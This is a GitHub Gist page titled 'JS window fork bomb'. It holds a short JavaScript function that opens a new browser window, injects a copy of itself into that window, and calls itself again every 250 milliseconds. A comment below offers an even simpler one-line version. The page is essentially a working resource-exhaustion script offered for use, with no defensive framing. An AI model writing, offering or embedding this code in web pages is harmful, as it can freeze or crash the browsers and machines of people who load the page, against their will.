Last active
June 3, 2023 11:19
-
-
Save wlib/073c9bfaac39062853b295afbd3283e5 to your computer and use it in GitHub Desktop.
JS window fork bomb
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Make sure to allow pop ups, or your browser will stop the window.open() (thankfully) | |
function fork() { | |
const win = window.open(); | |
const script = win.document.createElement("script"); | |
script.innerHTML = fork + "\n" + "fork();"; | |
win.document.head.appendChild(script); | |
setTimeout(function() { | |
win.close(); | |
fork(); | |
}, 250) | |
} | |
fork(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
The simplest line to make your window fork bomb script is:
window.open(this.window.location);